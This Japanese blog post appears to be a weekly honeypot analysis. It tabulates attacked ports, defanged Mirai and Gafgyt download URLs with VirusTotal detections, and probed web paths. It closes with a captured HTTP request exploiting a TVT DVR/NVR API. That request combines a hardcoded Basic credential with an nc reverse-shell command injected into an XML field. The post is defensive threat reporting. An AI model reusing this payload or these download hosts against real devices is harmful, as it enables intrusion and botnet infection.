【ハニーポット簡易分析】Honeypot簡易分析(408-415日目:10/2-10/9)
ちょっと、更新が遅れてしまいましたが、 ハニーポットの簡易分析となります。
◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>
<国別検知数および検知数>
<検知ポート>
| ポート番号 | サービス | 検知数 |
|
1433 |
ms-sql-s | 174504 |
| 5900 | vnc | 46001 |
| 445 | smb | 31742 |
| 22 | ssh | 24290 |
| 23 | telnet | 10621 |
| 3389 | rdp | 1960 |
| 3306 | mysql | 1139 |
| 21 | ftp | 1098 |
| 2121 | ftp | 955 |
| 5555 | ADB | 657 |
<検知マルウェア>
| malware | virustotal | virus name |
| hxxp://51[.]77[.]213[.]109/Mello1202/Yui[.]mips | https://www.virustotal.com/file/097a573d0884c8285150a937348160583e1f2141b47cccf42a8e902234a4133d/analysis/1570642774/ | MicroWorld-eScan:Gen:Variant.Trojan.Linux.Gafgyt.5, ALYac:Gen:Variant.Trojan.Linux.Gafgyt.5, ESET-NOD32:a variant of Linux/Gafgyt.WN, TrendMicro-HouseCall:Backdoor.Linux.GAFGYT.SMMR2, Avast:ELF:DDoS-Y [Trj], ClamAV:Unix.Trojan.Mirai-5607483-0, BitDefender:Gen:Variant.Trojan.Linux.Gafgyt.5, Rising:Backdoor.Gafgyt!1.BC96 (CLASSIC), Ad-Aware:Gen:Variant.Trojan.Linux.Gafgyt.5, DrWeb:Linux.BackDoor.Fgt.205, TrendMicro:Backdoor.Linux.GAFGYT.SMMR2, McAfee-GW-Edition:Linux/Gafgyt.h, FireEye:Gen:Variant.Trojan.Linux.Gafgyt.5, Emsisoft:Gen:Variant.Trojan.Linux.Gafgyt.5 (B), Jiangmin:Backdoor.Linux.dqzv, MAX:malware (ai score=82), Arcabit:Trojan.Trojan.Linux.Gafgyt.5, Avast-Mobile:ELF:DDoS-S [Trj], GData:Linux.Trojan-DDoS.Lightaidra.A, AhnLab-V3:Linux/Gafgyt.Gen15, McAfee:Linux/Gafgyt.h, Tencent:Backdoor.Linux.Tsunami.t, Ikarus:Trojan.Linux.Gafgyt, Fortinet:ELF/Gafgyt.WN!tr, AVG:ELF:DDoS-Y [Trj] |
| hxxp://188[.]241[.]73[.]110/bins/DEMONS[.]mips | https://www.virustotal.com/file/f9e617956ae85fb913b0cc5a53c14a2924170b99e070662d6de1e058ad81402f/analysis/1570677740/ |
McAfee:Linux/Mirai.n, |
| hxxp://174[.]128[.]226[.]101/mps | https://www.virustotal.com/file/9fecd9eb75360925cfd4ce7ff9d1b65d7dfeb049c39c9296e11e066380e101d1/analysis/1570718063/ |
MicroWorld-eScan:Gen:Variant.Backdoor.Linux.Tsunami.1, |
| hxxp://31[.]13[.]195[.]109/jaws[.]sh | https://www.virustotal.com/url/bdd12fe0171ecb51d25443c0c09f183b134a8271022b7e9651866e9742eca0c6/analysis/1568526339/ | |
| hxxp://pm[.]cpuminerpool[.]com/pm[.]sh | https://www.virustotal.com/file/81de9fc33ab05928f9abca627435b3fa40a3470e01dc435dddae0e7bec640274/analysis/1570688167/ | TrendMicro-HouseCall:Trojan.SH.SKIDMAP.UWEJY, TrendMicro:Trojan.SH.SKIDMAP.UWEJY |
| hxxp://31[.]13[.]195[.]49/x | https://www.virustotal.com/url/65071584ab70a5353da1eeec090311e3fb8c2c1de103387b2c94cb29d32ac4b3/analysis/1568512414/ | |
| hxxp://fky[.]dfg45dfg45[.]best/download[.]exe | https://www.virustotal.com/file/7520879098f0e216f226d8a50051955a31f3bd0c74e03062611c51ce1ba3b8f8/analysis/1570637038/ |
MicroWorld-eScan:Gen:Trojan.Downloader.fmGfaSf0Kfaj, |
| hxxp://anunna[.]club/x | https://www.virustotal.com/url/909fc6bee20704cbabf60e87015c40449ad952472d2bff376a1abffc9a699ec3/analysis/1570330378/ | |
| hxxp://188[.]241[.]73[.]110/g | https://www.virustotal.com/file/16255710879e7c60ca01cf7993a1621b7574229ac6fdd548fdbaee44a6ba0b16/analysis/1567892980/ | Kaspersky:HEUR:Trojan-Downloader.Shell.Agent.p, ZoneAlarm:HEUR:Trojan-Downloader.Shell.Agent.p |
| hxxp://Op[.]Cnazb[.]Xyz/IBS1[.]jpg | https://www.virustotal.com/url/2e31343b10cdffe83dfc9c82137979aac66d7be85ed568dc779db412cee76a54/analysis/1570282508/ | |
| hxxp://switchnets[.]net/unstable | https://www.virustotal.com/url/aacd30e68a31b91742fbe5a9078ae0823f13255018ab65efe39a0e4a6c48f89b/analysis/1568526555/ | |
| hxxp://104[.]244[.]78[.]187/bins/wolf[.]mpsl | https://www.virustotal.com/file/5f8a5aaab165316c0ec843d65131adeda63b5fec67696c6a0b4b062da9d6075c/analysis/1570681700/ | McAfee:RDN/Generic BackDoor, AegisLab:Trojan.Linux.Mirai.K!c, Symantec:Linux.Mirai, ESET-NOD32:a variant of Linux/Mirai.OX, TrendMicro-HouseCall:Possible_MIRAI.SMLBO20, Avast:ELF:Mirai-ACF [Trj], ClamAV:Unix.Trojan.Mirai-6976992-0, Kaspersky:HEUR:Backdoor.Linux.Mirai.b, NANO-Antivirus:Trojan.Elf32.Mirai.gceeny, Tencent:Backdoor.Linux.Mirai.wav, F-Secure:Malware.LINUX/Mirai.zzlrp, DrWeb:Linux.Mirai.1442, TrendMicro:Possible_MIRAI.SMLBO20, McAfee-GW-Edition:RDN/Generic BackDoor, Sophos:Mal/Generic-S, Avira:LINUX/Mirai.zzlrp, Fortinet:ELF/Mirai.RQ!tr, Antiy-AVL:Trojan[Backdoor]/Linux.Mirai.b, ZoneAlarm:HEUR:Backdoor.Linux.Mirai.b, Avast-Mobile:ELF:Mirai-XW [Trj], AhnLab-V3:Linux/Mirai.Gen11, Ikarus:Trojan.Linux.Mirai, GData:Linux.Trojan.Mirai.G, AVG:ELF:Mirai-ACF [Trj], Qihoo-360:Win32/Trojan.4d8 |
| hxxp://5[.]8[.]78[.]205/Skyline/mips_Skyline | https://www.virustotal.com/file/e6136fdcaa8daed79969abf0ed9cdb183c26735a33dbcb5c61c32bdd43a45f5f/analysis/1570689478/ | DrWeb:Linux.DDoS.291, Fortinet:ELF/DDoS.CIA!tr, AhnLab-V3:Linux/MalPack5.Exp |
| hxxp://93[.]174[.]93[.]178/rom[.]sh | https://www.virustotal.com/url/ed0c15dd75f224f47e7f413469c5ed3112115caa2957cfe02a88c30def6f5c7b/analysis/1570190290/ | |
| hxxp://185[.]117[.]75[.]248/bins/September[.]mips | https://www.virustotal.com/url/9ab48bd19ba8c43ec4ee32a490ddfcbeb9686fc381b881a81c9c5e496ff36412/analysis/1570642805/ | |
| hxxp://142[.]11[.]199[.]235/mips | https://www.virustotal.com/file/06dd850915d9dd8703119dd400c744fd9e8f6a96cde547ef6f8bb365dd339ac9/analysis/1569725933/ | ESET-NOD32:a variant of Linux/Mirai.AEL, TrendMicro-HouseCall:Trojan.Linux.MIRAI.SMMR1, Avast:ELF:Mirai-VV [Trj], Kaspersky:HEUR:Backdoor.Linux.Mirai.b, Tencent:Backdoor.Linux.Mirai.wao, Sophos:Linux/DDoS-CIA, DrWeb:Linux.Mirai.1443, TrendMicro:Trojan.Linux.MIRAI.SMMR1, Microsoft:DDoS:Linux/Gafgyt.YA!MTB, ZoneAlarm:HEUR:Backdoor.Linux.Mirai.b, Avast-Mobile:ELF:Mirai-UM [Trj], GData:Linux.Trojan.Mirai.E, AhnLab-V3:Linux/Mirai15.Exp, Rising:Backdoor.Mirai/Linux!1.BAF6 (CLASSIC), Ikarus:Trojan.Linux.Mirai, Fortinet:ELF/Mirai.OX!tr, AVG:ELF:Mirai-VV [Trj] |
| hxxp://142[.]11[.]199[.]235/arm7 | https://www.virustotal.com/file/89e9d8b64b786255ce2bb6dfd7971f4facf22ac17e6e3256d3edbdd86d54a6d1/analysis/1570686776/ | MicroWorld-eScan:Gen:Variant.Linux.Mirai.1, McAfee:RDN/Generic BackDoor, Zillya:Trojan.Mirai.Linux.10378, Cyren:ELF/Trojan.SJNJ-2, Symantec:Trojan.Gen.MBT, ESET-NOD32:a variant of Linux/Mirai.AEL, TrendMicro-HouseCall:Trojan.Linux.MIRAI.SMMR1, Avast:ELF:Mirai-AHV [Trj], ClamAV:Unix.Dropper.Mirai-7135925-0, Kaspersky:HEUR:Backdoor.Linux.Mirai.au, BitDefender:Gen:Variant.Linux.Mirai.1, NANO-Antivirus:Trojan.ElfArm32.Mirai.gbbqvh, AegisLab:Trojan.Linux.Mirai.K!c, Tencent:Backdoor.Linux.Mirai.wam, Ad-Aware:Gen:Variant.Linux.Mirai.1, Emsisoft:Gen:Variant.Linux.Mirai.1 (B), F-Secure:Malware.LINUX/Mirai.wnzpj, DrWeb:Linux.Mirai.2618, TrendMicro:Trojan.Linux.MIRAI.SMMR1, McAfee-GW-Edition:RDN/Generic BackDoor, FireEye:Gen:Variant.Linux.Mirai.1, Sophos:Linux/DDoS-CIA, Ikarus:Trojan.Linux.Mirai, Jiangmin:Backdoor.Linux.droo, Avira:LINUX/Mirai.wnzpj, Fortinet:ELF/Mirai.AE!tr, Antiy-AVL:Trojan[Backdoor]/Linux.Mirai.au, Arcabit:Trojan.Linux.Mirai.1, ZoneAlarm:HEUR:Backdoor.Linux.Mirai.au, Avast-Mobile:ELF:Mirai-UM [Trj], Microsoft:DDoS:Linux/Gafgyt.YA!MTB, AhnLab-V3:Linux/Mirai13.Exp, ALYac:Gen:Variant.Linux.Mirai.1, MAX:malware (ai score=89), Rising:Backdoor.Mirai/Linux!1.BAF6 (CLASSIC), GData:Gen:Variant.Linux.Mirai.1, AVG:ELF:Mirai-AHV [Trj], Qihoo-360:Win32/Backdoor.3df |
<国別検知数および検知数>
<ターゲット別検知数>
| target | count |
| - | 289 |
| phpMyAdmin | 267 |
| FreePBX | 59 |
| Unauthorized Relay | 9 |
| txt | 8 |
| ThinkPHP | 7 |
| SQLiteManager | 6 |
| cfg file | 6 |
| Admin config | 4 |
| SQL | 4 |
| IP camera | 3 |
| D-Link DIR-850L | 2 |
| SQLite | 2 |
| Scanner | 2 |
| Tomcat | 2 |
| DGN1000 Netgea Router | 1 |
| Discussion on UserPro | 1 |
| SQLite Manager | 1 |
| Unknown | 1 |
<新規検知パス>
| path | target | reference |
| //myadmin// | phpMyAdmin | - |
| //myadmin/scripts/setup.php | phpMyAdmin | - |
| //phpadmin// | phpMyAdmin | - |
| //phpmyadmin// | phpMyAdmin | - |
| //phpmyadmin/scripts/setup.php | phpMyAdmin | - |
| /C$ | WebDAV | - |
| /C$/ | WebDAV | - |
| /Pages/login.htm | ||
| /VSR3/Forms/Login/Login.aspx | VoipSwitch Resellers System | http://reportes.voipperu.com.pe/VSR3/Forms/Login/Login.aspx?ReturnUrl=%2FVSR3%2Fdefault.aspx |
| /VSR3/extjs/ext-all-js/ext.axd | VoipSwitch Resellers System | http://reportes.voipperu.com.pe/VSR3/Forms/Login/Login.aspx?ReturnUrl=%2FVSR3%2Fdefault.aspx |
| /_html/main.asp | - | - |
| /a2billing/admin/Public/index.php | a2billing | http://www.asterisk2billing.org/ |
| /cgi-bin/nobody/Search.cgi | AVTECH IP Camera | https://www.exploit-db.com/exploits/40500 |
| /editBlackAndWhiteList | Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API | https://github.com/mcw0/PoC/blob/master/TVT-PoC.py |
| /images.php | phpMyAdmin | https://malware.news/t/finding-neutrino/32345 |
<気になった通信>
Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API におけるリモードコード実行の脆弱性
POST /editBlackAndWhiteList HTTP/1.1
User-Agent: ApiTool
Authorization: Basic admin:{12213BD1-69C7-4862-843D-260500D1DA40}
<?xml version="1.0" encoding="utf-8"?>
<request version="1.0" systemType="NVMS-9000" clientType="WEB">
<types>
<filterTypeMode>
<enum>refuse</enum><enum>allow</enum>
</filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum>
<enum>mac</enum></addressType></types><content><switch>true</switch>
<filterType type="filterTypeMode">refuse</filterType><filterList type="list">
<itemType><addressType type="addressType"/></itemType><item>
<switch>true</switch><addressType>ip</addressType>
<ip>$(nc${IFS}93[.]174[.]93[.]178${IFS}31337${IFS}-e${IFS}$SHELL&)</ip>
</item></filterList></content></request>
DVR/NVR/IPC のAPIにおける脆弱性を狙った通信であり、Basic認証を突破した後にncコマンドでコード実行を狙った通信と思われます。
IP情報:93[.]174[.]93[.]178
https://www.shodan.io/host/93.174.93.178
以上となります。
